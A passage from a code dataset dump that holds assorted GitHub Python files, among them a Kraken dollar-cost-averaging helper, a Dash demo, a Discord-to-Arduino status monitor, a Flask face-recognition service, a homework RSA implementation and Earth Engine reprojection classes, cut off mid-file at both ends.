pair_orders = DCA.filter_ignored_orders(pair_orders, filter_amount)\n return pair_orders\n\n @staticmethod\n def filter_ignored_orders(pair_orders: dict, amount: float) -> dict:\n \"\"\"\n Removes any order for the pair_orders dict that have an amount\n (=order_info['cost']) that differs by more than 1% of the given amount.\n\n :param pair_orders: Dict of orders of a currency pair.\n :param amount: Amount of interest that is kept in the result (+-1%)\n :return: Filtered dictionary\n \"\"\"\n\n def is_similiar_amount(order_info):\n try:\n price = float(order_info.get(\"descr\").get(\"price\"))\n order_amount = float(order_info.get(\"vol\")) * price\n except (ValueError, TypeError, KeyError) as e:\n logger.info(\n f\"Cannot figure out order amount of {order_info}: {e}\"\n )\n return True # don't skip in order to avoid repeating orders.\n include_order = amount * 0.99 < order_amount < amount * 1.01\n if not include_order:\n logger.info(\n f\"Ignoring an existing/closed order of {order_amount}\"\n )\n return include_order\n\n return {k: v for k, v in pair_orders.items() if is_similiar_amount(v)}\n\n def send_buy_limit_order(self, order: Order) -> None:\n \"\"\"\n Send a limit order for specified dca pair and amount to Kraken.\n\n :return: None.\n \"\"\"\n if order.volume < self.pair.order_min:\n raise ValueError(\n f\"Too low volume to buy {self.pair.base}: \"\n f\"current {order.volume}, \"\n f\"minimum {self.pair.order_min}.\"\n )\n logger.info(\n f\"Create a {order.price}{self.pair.quote} buy limit order of \"\n f\"{order.volume}{self.pair.base} at \"\n f\"{order.pair_price}{self.pair.quote}.\"\n )\n logger.info(\n f\"Fee expected: {order.fee}{self.pair.quote} (0.26% taker fee).\"\n )\n logger.info(\n f\"Total price expected: {order.volume}{self.pair.base} for \"\n f\"{order.total_price}{self.pair.quote}.\"\n )\n order.send_order(self.ka)\n logger.info(\"Order successfully created.\")\n logger.info(f\"TXID: {order.txid}\")\n logger.info(f\"Description: {order.description}\")\n","repo_name":"adocquin/kraken-dca","sub_path":"krakendca/dca.py","file_name":"dca.py","file_ext":"py","file_size_in_byte":11516,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"22240716377","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport dash\nimport dash_core_components as dcc # 交互式组件\nimport dash_html_components as html # 代码转html\nfrom dash.dependencies import Input, Output # 回调\nfrom jupyter_plotly_dash import JupyterDash # Jupyter中的Dash,如有疑问,见系列文章第2篇【安装】\n\n\napp = JupyterDash('Chained Callbacks')\nall_options = {\n '北京': ['东城区', '西城区', '朝阳区'],\n '上海': ['黄浦区', '静安区', '普陀区']\n}\n\napp.layout = html.Div([\n dcc.RadioItems(\n id = 'countries-dropdown',\n options = [{'label': k, 'value': k} for k in all_options.keys()],\n value = '北京'),\n html.Hr(),\n dcc.RadioItems(id = 'cities-dropdown'),\n html.Hr(),\n html.Div(id = 'display-selected-values')\n])\n\n@app.callback(\n Output('cities-dropdown', 'options'),\n [Input('countries-dropdown', 'value')])\ndef set_cities_options(select_country):\n return [{'label': i, 'value': i} for i in all_options[select_country]]\n\n@app.callback(\n Output('cities-dropdown', 'value'),\n [Input('cities-dropdown', 'options')])\ndef set_cities_value(available_options):\n return available_options[0]['value']\n\n@app.callback(\n Output('display-selected-values', 'children'),\n [Input('countries-dropdown', 'value'),\n Input('cities-dropdown', 'value')])\ndef set_display_children(select_country, select_city):\n return f\"{select_city}是{select_country}的辖区。\"\n\napp","repo_name":"zhoujia0219/code_practise","sub_path":"chained mode callback.py","file_name":"chained mode callback.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7154663760","text":"import csv\nfrom contextlib import closing\n\nimport requests\nfrom ..debug import debug\n\nclass BytesDecoder:\n def __init__(self, stream):\n self.stream = stream\n\n def __iter__(self):\n for line in self.stream:\n line = line.decode()\n # debug(\"Processing {}\", line)\n yield line\n\nclass Spreadsheet:\n def __init__(self, url):\n self.url = url\n self.response = None\n self.data = None\n\n def download(self):\n with closing(requests.get(self.url, stream=True)) as resp:\n if not resp.ok:\n debug(\"Original URL: {}\", self.url)\n debug(\"Spreadsheets response: {}:\\n{}\", resp, resp.text)\n raise AssertionError(\n f\"Response from Google Spreadsheets ({resp.request.url!r}) is not OK.\"\n )\n self.response = resp\n self.process()\n\n def process(self):\n # почему генератор списка вместо тупо list()?\n # пот��му что list() зачем-то вызывает len(),\n # который снова вызывает load_all, и получается рекурсия\n self.data = [x for x in self]\n\n def __iter__(self):\n if not self.response:\n self.download()\n stream = BytesDecoder(self.response.raw)\n reader = csv.reader(stream)\n try:\n next(reader) # пропускаем заголовок\n except StopIteration: # ну и ладно...\n pass\n yield from reader\n\n def __getitem__(self, num):\n if self.data is None:\n self.download()\n return self.data[num]\n\n def __len__(self):\n if self.data is None:\n self.download()\n return len(self.data)\n","repo_name":"Close-Encounters-Corps/EDMC-Triumvirate","sub_path":"modules/lib/spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"ru","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"34328037694","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\"\"\"\r\n==============\r\nWisteria\r\n==============\r\nAlgorithm used:\r\n Take a number n (say 13)\r\n Find the product of non - zero digits in n (1*3 = 3)\r\n Subtract the obtained number from the starting number n (13 - 3 = 10)\r\n Repeat the steps for a large list of positive numbers\r\nFor example, for 25\r\n product_of_digits(25) = 2*5 = 10\r\n 25 - 10 = 15 (final result for number 25)\r\nFor example, for 10125\r\n product_of_digits(10125) = 1*1*2*5 = 10 (only non zero numbers)\r\n 10125 - 10 = 10110 (final result for number 10125)\r\nPlot the numbers on the x axis and the corresponding resulting numbers on the y axis\r\n\"\"\"\r\n\r\ndef wisteria(x):\r\n temp = x\r\n product_of_digits = 1\r\n while temp > 0:\r\n rem = temp % 10\r\n if rem == 0:\r\n pass\r\n else:\r\n product_of_digits *= rem\r\n temp //= 10\r\n output = x - product_of_digits\r\n return output\r\n\r\nx = np.arange(0, 500, 1)\r\ny = []\r\nprint('Please wait while we plot the graph...')\r\nfor i in x:\r\n y.append(wisteria(i))\r\nprint('Done')\r\nplt.plot(x, y,'r+', linestyle = 'dotted', markeredgecolor = 'blue')\r\nplt.title('Wisteria')\r\nplt.show()\r\n\r\n","repo_name":"sneaky-potato/matplotlib-projects","sub_path":"wisteria.py","file_name":"wisteria.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35059755362","text":"import os\nimport configparser\nimport sys\nimport threading\nimport time\nimport sched\nimport atexit\nfrom shutil import copyfile\n\nfrom pyfirmata import Arduino\nimport discord\nfrom ShiftOut import ShiftOut\nfrom Status import *\n\nimport SysTrayIcon\n\nREFRESH = 0.5\n\n\nclass DiscordMonitor:\n def __init__(self):\n self.client = discord.Client()\n\n # Extract data from config file\n self.config = configparser.ConfigParser()\n if not os.path.isfile(\"config.ini\"):\n copyfile(\"default.ini\", \"config.ini\")\n self.config.read(\"config.ini\")\n self.username = self.config['LoginInfo']['Email']\n self.password = self.config['LoginInfo']['Password']\n\n # Initialize Arduino\n comm = Arduino('COM3')\n latchPin = int(self.config['Pins']['latchPin'])\n clockPin = int(self.config['Pins']['clockPin'])\n dataPin = int(self.config['Pins']['dataPin'])\n self.monitor = ShiftOut(comm, dataPin, latchPin, clockPin)\n\n # Clear board\n self.monitor.ShiftOut(0x00)\n\n self.threads = {}\n\n # Schedule callback\n self.sched = sched.scheduler(time.time, time.sleep)\n self.sched.enter(REFRESH, 1, self.update)\n t_sched = threading.Thread(target=self.sched.run, daemon=True)\n t_sched.start()\n self.threads['t_sched'] = t_sched\n\n def run_tray_icon(): SysTrayIcon.SysTrayIcon('dm.ico', 'Discord Monitor', (), on_quit=lambda *_: self.exit())\n\n # Set up Tray Icon to keep other threads running\n # Exits when only daemon threads left\n t_tray = threading.Thread(target=run_tray_icon, daemon=False)\n t_tray.start()\n self.threads['t_tray'] = t_tray\n\n # Log into Discord\n self.login()\n\n def update(self):\n # Disconnected\n status = DISCONNECTED\n if self.client.is_logged_in:\n status |= CONNECTED\n for server in self.client.servers:\n member_id = server.get_member(self.client.user.id)\n member_voice = member_id.voice\n if member_voice is not None:\n if member_voice.deaf or member_voice.self_deaf:\n status |= DEAFENED\n break\n elif member_voice.mute or member_voice.self_mute:\n status |= MUTED\n break\n self.monitor.ShiftOut(status)\n self.sched.enter(REFRESH, 1, self.update)\n\n def login(self):\n print(\"Attempting to log in as {}...\".format(self.username))\n # Checks if script is already running\n if self.threads.get(\"t_client\"):\n print('Duplicate login')\n self.client.logout()\n t_client = threading.Thread(target=self.client.run, args=(self.username, self.password), daemon=True)\n t_client.start()\n self.threads['t_client'] = t_client\n\n def exit(self):\n print('Exiting...')\n sys.exit()\n\n\ndef main():\n monitor = DiscordMonitor()\n atexit.register(monitor.exit)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main()\n except:\n pass\n else:\n break\n","repo_name":"wwong7132/DiscordMonitor","sub_path":"DiscordMonitor.pyw","file_name":"DiscordMonitor.pyw","file_ext":"pyw","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71236704106","text":"import cv2\nimport numpy as np\nimport os\nfrom os import listdir\nfrom os import makedirs\nfrom os.path import isfile, join\n\n\nface_dirs= os.path.join(os.getcwd(),'faces')\nprint(face_dirs)\n\n\n#face_dirs= './faces/'\nface_classifier = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n#전체 사진에서 얼굴 부위만 잘라 리턴\ndef face_extractor(img):\n #흑백처리\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n gray = np.array(gray,dtype='uint8')\n #얼굴 찾기\n faces = face_classifier.detectMultiScale(gray)\n #찾는 얼굴이 없으면 None으로 리턴\n if faces is():\n return None\n\n for(x,y,w,h) in faces:\n cropped_face = img[y:y+h, x:x+w]\n\n return cropped_face\n\ndef face_detector(img, size=0.5):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray)\n\n if faces is():\n return img,[]\n\n for(x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,255),2)\n roi = img[y:y+h,x:x+w]\n roi = cv2.resize(roi,(200,200))\n\n return img,roi\n\nfrom flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_cors import CORS\nfrom tensorflow.keras.models import load_model\nimport io\nimport time\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/face/train\" , methods=[\"GET\",'POST'])\ndef train_pictures():\n num = request.form['data']\n if not os.path.isdir(face_dirs+'/'+num):\n os.makedirs(face_dirs+'/'+num, exist_ok=True)\n cap = cv2.VideoCapture(0)\n\n #저장할 이미지 카운트 변수\n count = 0\n\n while True:\n #카메라로부터 사진 1장 얻기1장 얻기\n ret, frame = cap.read()\n if face_extractor(frame) is not None:\n count+=1\n face = cv2.resize(face_extractor(frame),(200,200))\n face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n\n file_num_path = './faces/'+num+'/'+num+str(count)+'.jpg'\n file_dirs = './faces/'+num+'/'\n print(file_dirs)\n cv2.imwrite(file_num_path,face)\n\n cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Face Cropper',face)\n else:\n print(\"Face not Found\")\n pass\n\n if cv2.waitKey(1)==13 or count==50:\n break\n cap.release()\n cv2.destroyAllWindows()\n print(\"Collecting Samples Complete\")\n\n #faces폴더에 있는 파일 리스트 얻기\n file_list = [file for file in os.listdir(file_dirs) if os.path.isfile(join(file_dirs,file))]\n # print(file_list)\n #데이터와 매칭될 라벨 변수\n training_data,labels = [],[]\n\n #파일 개수 만큼 루프\n for i,files in enumerate(file_list):\n image_path = file_dirs + file_list[i]\n # print(image_path)\n #이미지 불러오기\n images = cv2.imread(image_path,cv2.IMREAD_GRAYSCALE)\n\n #이미지 파일이 아니거나 못 읽어 왔다면 무시\n if images is None:\n continue\n #training_data 리스트에 이미지를 바이트 배열로 추가\n training_data.append(np.asarray(images,dtype=np.uint8))\n #labels 리스트엔 카운트 번호 추가\n labels.append(i)\n\n if len(labels) == 0:\n print(\"There is no data to train\")\n exit()\n\n #labels를 32비트 정수로 변환\n labels = np.asarray(labels, dtype=np.int32)\n #모델 생성\n model = cv2.face.LBPHFaceRecognizer_create()\n #학습 시작\n model.train(np.asarray(training_data), np.asarray(labels))\n model.save(num+\"face_model.yml\")\n return \"얼굴 저장 완료\"\n\n@app.route(\"/face/recognition\" , methods=[\"GET\",'POST'])\ndef recognition():\n t_end = time.time()+15\n num = request.form['data']\n cap = cv2.VideoCapture(0)\n model = cv2.face.LBPHFaceRecognizer_create()\n model.read(num+\"face_model.yml\")\n confidence = 0\n lock_list=[]\n\n while time.time()<=t_end:\n\n ret, frame = cap.read()\n\n image, face = face_detector(frame)\n\n try:\n face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n result = model.predict(face)\n #result[1]은 신뢰도 0에 가까울수록 본인이라는 뜻\n if result[1] < 500:\n confidence = int(100*(1-(result[1])/300))\n display_string = str(confidence)+'% Confidence it is user'\n cv2.putText(image,display_string,(100,120),cv2.FONT_HERSHEY_COMPLEX,1,(250,120,255),2)\n\n if confidence >= 70:\n cv2.putText(image, \"Unlocked\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Face Cropper',image)\n lock_list.append('Unlocked')\n\n else:\n cv2.putText(image,\"Locked\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,255),2)\n cv2.imshow('Face Cropper', image)\n\n except:\n cv2.putText(image,\"Face Not Found\",(250,450),cv2.FONT_HERSHEY_COMPLEX,1,(255,0,0),2)\n cv2.imshow('Face Cropper', image)\n pass\n\n if cv2.waitKey(10)==13:\n break\n\n if confidence>=70:\n break\n\n lock_list.append('Locked')\n cap.release()\n cv2.destroyAllWindows()\n return lock_list[0]\n\n\n\n\nif __name__ == \"__main__\" :\n app.run(host=\"localhost\", port=\"9500\")\n","repo_name":"developer-yechan/Cognitive-Rehabilitation-Training-Service","sub_path":"src/main/python/model/face/faceRecognition.py","file_name":"faceRecognition.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23041962471","text":"from player_reader import PlayerReader\nfrom enum import Enum\n\nclass SortBy(Enum):\n POINTS = 1\n GOALS = 2\n ASSISTS = 3\n\ndef sort_by(player, sorting_method=SortBy.POINTS):\n if sorting_method == SortBy.GOALS:\n return player.goals\n elif sorting_method == SortBy.ASSISTS:\n return player.assists\n return player.points\n\nclass StatisticsService:\n def __init__(self, io):\n self.io = io\n self._players = self.io.get_players()\n\n def search(self, name):\n for player in self._players:\n if name in player.name:\n return player\n\n return None\n\n def team(self, team_name):\n players_of_team = filter(\n lambda player: player.team == team_name,\n self._players\n )\n\n return list(players_of_team)\n\n def top(self, how_many, sorting_method=SortBy.POINTS):\n \n sorted_players = sorted(\n self._players,\n reverse=True,\n key=lambda player:sort_by(player, sorting_method)\n )\n\n result = []\n i = 0\n while i < how_many:\n result.append(sorted_players[i])\n i += 1\n\n return result\n","repo_name":"brotholi/ohtu-palautusrepositorio","sub_path":"viikko1/nhl-statistics-1/src/statistics_service.py","file_name":"statistics_service.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22178079797","text":"from djongo import models\n\n# Create your models here.\n\nclass Blog(models.Model):\n name = models.CharField(max_length=100)\n tagline = models.TextField()\n class Meta:\n abstract = True\n\n\nclass Entry(models.Model):\n blog = models.EmbeddedField(model_container=Blog,)\n headline = models.CharField(max_length = 255)\n objects = models.DjongoManager()\n\n def __str__(self):\n return str(self.blog) + str(self.headline)","repo_name":"zhoukaisspu/django_mongo","sub_path":"mysite/polls/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41762721638","text":"import math\r\nimport random\r\n#choosing p and q atleast 10^200 big\r\nhexalphabet = \"0123456789ABCDEF\"\r\nalphabet = \"abcdefghijklmnopqrstuvwxyz\" #for p and q\r\nalphabet2 = \".,?! \\t\\n\\rabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"# encrpt decrypt\r\n\r\nkey1 = \"once the lord of light banished dark and all that stemmed from humanity and men assumed a fleeting form these are the roots of our world men are props on the stage of life and no matter how tender how exquisite a lie will remain a lie\"\r\nkey2 = \"the dragons shall never be forgotten we knights fought valiantly but for every one of them we lost three score of our own exhiliration pride hatred rage the dragons teased out our dearest emotions thou will understand one day at thy twilight old thoughts return in great waves of nostalgia\"\r\n#from base 10 in the book section ch4.2 algorithm 1. example 6\r\ndef tobase10(alphabet, s): #string to number\r\n\tvalue = 0\r\n\tfor c in s:\r\n\t\tif (c in alphabet):\r\n\t\t\tpos = alphabet.find(c)\r\n\t\t\tvalue *= len(alphabet)\r\n\t\t\tvalue += pos\r\n\treturn value\r\n\t#if(value <= 10**200):\r\n\t\t#print(\"the value was below 10**200, try again\")\r\n\t\t#return None\r\n\t#else:\r\n\t\t#value = value % 10**200\r\n\t\t#value = ToOddToPrime(value)\r\n\t\t#print(value)\r\n\t\t#return value\r\n\r\ndef frombase10(alphabet, num):\r\n\tz = []\r\n\tk = 0\r\n\ttemp = \"\"\r\n\twhile num != 0:\r\n\t\tz.append(num % len(alphabet))\r\n\t\t#print(z[k])\r\n\t\tnum = num//len(alphabet)\r\n\t\tk += 1\r\n\r\n\twhile k != 0:\r\n\t\ttemp += alphabet[z[k-1]]\r\n\t\tk -= 1\r\n\t#print (temp)\r\n\treturn temp\r\n\r\n\r\ndef ToOddToPrime(value):\r\n\twhile(value % 2 == 0):\r\n\t\tvalue += 1\r\n\t#print(\"value turned odd\")\r\n\twhile(isPrime(value) == False):\r\n\t\tvalue += 2\r\n\t#print(\"value turned prime\")\r\n\treturn value\r\n\r\ndef GCD(a,b):\r\n\tif (b > a):\r\n\t\treturn GCD(b,a)\r\n\tif (a % b == 0):\r\n\t\treturn b\r\n\treturn GCD(b, a%b)\r\n\r\ndef egcd(a, b):\r\n if a == 0:\r\n return (b, 0, 1)\r\n else:\r\n g, y, x = egcd(b % a, a)\r\n return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n g, x, y = egcd(a, m)\r\n if g != 1:\r\n raise Exception('modular inverse does not exist')\r\n else:\r\n return x % m\r\n\r\ndef generateKeys(Sp, Sq):\r\n\tp = tobase10(alphabet, Sp)\r\n\tq = tobase10(alphabet, Sq)\r\n\t#print(\"this is P before 10^200 \", p)\r\n\tif(p <= 10**200):\r\n\t \tprint(\"the value was below 10**200, try again\")\r\n\t \treturn None\r\n\telse:\r\n\t \tp = p % 10**200\r\n\t \tp = ToOddToPrime(p)\r\n\t \t#print(\"this is P after 10^200 \", p)\r\n\tif(q <= 10**200):\r\n\t \tprint(\"the value was below 10**200, try again\")\r\n\t \treturn None\r\n\telse:\r\n\t \tq = q % 10**200\r\n\t \tq = ToOddToPrime(q)\r\n\t \t#print(\"this is P after 10^200 \", p)\r\n\tn = p*q\r\n\tr = (p-1)*(q-1)\r\n\te = 10**398 + 1\r\n\twhile (GCD(r, e) != 1):\r\n\t\te += 2\r\n\td = modinv(e, r)\r\n\t#print(\"Public: \\n\", n, \"\\n\", e, \"\\n\")\r\n\t#save to a file Public.txt\r\n\tf = open(\"public.txt\", \"w\")\r\n\tf.write(str(n))\r\n\tf.write(\"\\n\")\r\n\tf.write(str(e))\r\n\tf.close()\r\n\r\n\t#print(\"Private: \\n\", n, \"\\n\", d, \"\\n\")\r\n\t#save to a file Private.txt\r\n\tf = open(\"private.txt\", \"w\")\r\n\tf.write(str(n))\r\n\tf.write(\"\\n\")\r\n\tf.write(str(d))\r\n\tf.close()\r\n\t#print(\"d*e%r is\",d*e%r)\r\n\r\ndef Encrypt(inputFile, outputFile):\r\n\tfin = open(inputFile,\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tn = 0\r\n\te = 0\r\n\tfin = open(\"public.txt\",\"rb\")\r\n\tpublicTextBinary = fin.readlines()\r\n\tfin.close()\r\n\tfor x in range(len(publicTextBinary)):\r\n\t\ttemp = publicTextBinary[x].decode(\"utf-8\")\r\n\t\ttemp.strip(\"\\n\")\r\n\t\tif(x == 0):\r\n\t\t\tn = int(temp)\r\n\t\telse:\r\n\t\t\te = int(temp)\r\n\r\n\t#print(n)\r\n\t#print(e)\r\n\tf = open(outputFile, \"wb\")\r\n\t#Convert the resulting integers back to the base 70 alphabet,(from base 10)\r\n\tblocks = (len(PlainText) - 1)/ 216 + 1 \r\n\tblocks = int(blocks)\r\n\tsubBlocks = [] #Treat the input file text as a base 70 integer, 216cha\r\n\r\n\tstart = 0\r\n\tend = 215\r\n\tincrament = 215\r\n\t#print(\"PlainText: \\n\",PlainText)\r\n\t#print(blocks)\r\n\tfor i in range(blocks): \t\t\t\t\t\t\t\t# i = 0-3 #for each block \r\n\t\t#print(\"start:\", start)\r\n\t\t#print(\"end\", end)\r\n\t\t#print(PlainText[630:850])\r\n\t\tsubBlocks.append(PlainText[start:end])\r\n\t\t#print(len(subBlocks))\r\n\t\t#print(subBlocks[i], \"\\n\") \t\t\t\t#grab the 216cha\r\n\t\tM = tobase10(alphabet2, subBlocks[i])\r\n\t\t#print(M)\r\n\t\tif(M > n):\t\t\t\t\t\t\t\t#make sure the value is less than n\r\n\t\t\tprint(\"error the sub block was greater than N\")\r\n\t\t\treturn None\r\n\t\tE = pow(M,e,n) \t\t\t\t\t#Encode each block using the rules of RSA. m^e%n\r\n\t\t#print(E)\r\n\t\tEtext = frombase10(alphabet2, E)#Convert the resulting integers back to the base 70 alphabet,(from base 10)\r\n\t\tEtext += \"$\"\r\n\t\t#print(Etext)\r\n\t\ttemp = Etext.encode(\"utf-8\")\r\n\t\tf.write(temp)\r\n\t\tstart += incrament\r\n\t\tend += incrament\r\n\t\t#print(subBlocks[i], \"\\n\")\r\n\r\n\t\t#print(subBlocks[j])\r\n\tf.close()\r\n\r\n\t#and write to the output file. Put a $ after each block to indicate where each block ends. \r\n\t#Note that the output file should also be opened in binary mode, so to write text to it, \r\n\t#the text must first be converted to binary as follows:\r\n\t#fout.write( stringMessage.encode(\"utf-8\") )\r\n\r\ndef Decrypt(inputFile, outputFile):\r\n\tfin = open(inputFile,\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\tsubBlocks = PlainText.split(\"$\")\r\n\t#print(subBlocks)\r\n\r\n\tn = 0\r\n\td = 0\r\n\tfin = open(\"private.txt\",\"rb\")\r\n\tprivateTextBinary = fin.readlines()\r\n\tfin.close()\r\n\tfor x in range(len(privateTextBinary)):\r\n\t\ttemp = privateTextBinary[x].decode(\"utf-8\")\r\n\t\ttemp.strip(\"\\n\")\r\n\t\tif(x == 0):\r\n\t\t\tn = int(temp)\r\n\t\t\t#print (n)\r\n\t\telse:\r\n\t\t\td = int(temp)\r\n\t\t\t#print(d)\r\n\r\n\tf = open(outputFile, \"wb\")\r\n\tfor i in range(len(subBlocks)):\r\n\t\t#print(\"---------------------------\\n\")\r\n\t\t#print(subBlocks[i])\r\n\t\tE = tobase10(alphabet2, subBlocks[i])\r\n\t\t#print (E)\r\n\t\tD = pow(E,d,n)\r\n\t\t#print(D)\r\n\t\tM = frombase10(alphabet2, D)\r\n\t\t#print(M)\r\n\t\ttemp = M.encode(\"utf-8\")\r\n\t\tf.write(temp)\r\n\tf.close()\r\n\t\t#print(subBlocks[i])\r\n\t#Use the same alphabet as above.\r\n\r\n\t#Treat the input file text as a base 70 integer, \r\n\t#and convert it to base 10, using block sizes as indicated by the $ signs.\r\n\r\n\t#Decode each block using the rules of RSA. (Read n and d from private.txt)\r\n\r\n\t#Convert the resulting integers back to the base 70 alphabet, \r\n\t#and write to the output file, again converting to binary mode as explained above.\r\n\r\ndef MillersTest(N):\r\n\tb = random.randrange(2, N)\r\n\tT = N - 1\r\n\ts = 0\r\n\tfor i in range(N):\r\n\t\tif(T % 2 == 0):\r\n\t\t\ts += 1\r\n\t\t\tT = T//2\r\n\t\telse:\r\n\t\t\tbreak\r\n\r\n\tif (pow(b,T,N) == 1):\r\n\t\treturn True\r\n\r\n\tfor j in range(0,s):\r\n\t\tpower = (2**j)*T\r\n\t\tif (pow(b,power,N) == N - 1):\r\n\t\t\treturn True # 3/4 chance prime\r\n\r\n\treturn False # for sure composite\r\n\r\n\r\n\r\ndef isPrime(N):\r\n\tfor i in range(20):\r\n\t\tok = MillersTest(N)\r\n\t\tif(ok == False):\r\n\t\t\treturn False #composite\r\n\t\t\r\n\treturn True #almost surely Prime\r\n\r\ndef main():\r\n\tgenerateKeys(key1, key2)\r\n\t#Make a plain text file consisting of only letters in the alphabet.\r\n\t#It should be long enough to require multiple encoding blocks.\r\n\t\r\n\t#Encrypt(\"plaintext.txt\",\"en_output.txt\")#Call your Encrypt method.\r\n\r\n\tDecrypt(\"BlakeEncrypted.txt\", \"de_output.txt\")#Call your Decrypt method.\r\n\r\n\t#Verify that the decoded output file exactly matches the original plain text file.\r\n\tfin = open(\"plaintext.txt\",\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tPlainText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tfin = open(\"de_output.txt\",\"rb\")\r\n\tPlainTextBinary = fin.read()\r\n\tendText = PlainTextBinary.decode(\"utf-8\")\r\n\tfin.close()\r\n\r\n\tif(PlainText == endText):\r\n\t\tprint(\"The files matche, congradulations\")\r\n\telse:\r\n\t\tprint(\"FAIL\")\r\n\t\tprint(\"this is plain text \\n\", PlainText)\r\n\t\tprint(\"this is endText \\n\", endText)\r\n\r\nmain()","repo_name":"Doctorhobo/RSA","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35300381243","text":"\"\"\"\r\nCrie uma lista de números inteiros e crie uma nova lista com os elementos que são divisíveis por 3.\r\n\"\"\"\r\nlista_div_tres = []\r\nlista_numeros = list(range(1, 51))\r\n\r\nfor numero in lista_numeros:\r\n if numero % 3 == 0:\r\n lista_div_tres.append(numero)\r\n\r\nprint(lista_numeros)\r\nprint(f'Números divisíveis por 3:')\r\nprint(f'{lista_div_tres}')","repo_name":"helton-barbosa/Python-3-Full","sub_path":"listas/exercicio_10.py","file_name":"exercicio_10.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"718607487","text":"#\n# \n#\nimport numbers\nimport ee\nimport geeutils\nimport geebiopar\nimport geemask\n\n\n\"\"\"\n\"\"\"\nclass IProjectable(object):\n \"\"\"\n By default, Earth Engine performs nearest neighbor resampling by default during reprojection.\n \n used in GEECol.getcollection (reproject to align pixel boundaries of the product with reference roi)\n \"\"\"\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n depending on the nature of the (images in) the collection,\n reprojecting (to larger pixels) will be done by averaging (ordinal images),\n selecting the median (categorical images) or by a specific algorithm (e.g. log scaled images).\n\n TODO: check that these reductions reduce to nop in case native projection.nominalScale > target projection.nominalScale\n TODO: check that median uses existing values only - nope. doesn(t work. switching to 'mode'\n TODO: should we split ordinal images further into mean, median, ... ? S1 will always be UserProjectable, but what with rgb's?\n \"\"\"\n #\n # default implementation might be nearest neighbor\n #\n # return (eeimagecollection\n # .map(lambda image: image.reproject(eeprojection)))\n #\n # but we prefer to avoid defaults as far as possible\n #\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n\n\"\"\"\n\"\"\"\nclass UserProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n to be implemented by daughter\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n\n\"\"\"\n\"\"\"\nclass CategoricalProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n reproject categorical collection \n - using mode because that is what we want\n - unweighted to avoid 'float' values due to fractional pixel selections\n \n remark: \n - in case a categorical image is down sampled considerably, mode is a far better method than nearest neighbor\n - in case a categorical image is down sampled nominally, mode acts as a smoother, whereas nearest neighbor can introduce pixel shifts\n - bottom line: no silver bullet\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}._reproject - using Reducer.mode() - {geeutils.szprojectioninfo(eeprojection)}\")\n def reproject(image):\n return (image\n .reduceResolution(ee.Reducer.mode().unweighted(), maxPixels=4096)\n .reproject(eeprojection))\n \n eeimagecollection = eeimagecollection.map(reproject)\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass OrdinalProjectable(IProjectable):\n def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n \"\"\"\n reproject ordinal collection - using mean\n \"\"\"\n if verbose: print(f\"{str(type(self).__name__)}._reproject - using Reducer.mean() - {geeutils.szprojectioninfo(eeprojection)}\")\n def reproject(image):\n return (image\n .reduceResolution(ee.Reducer.mean(), maxPixels=4096)\n .reproject(eeprojection))\n \n eeimagecollection = 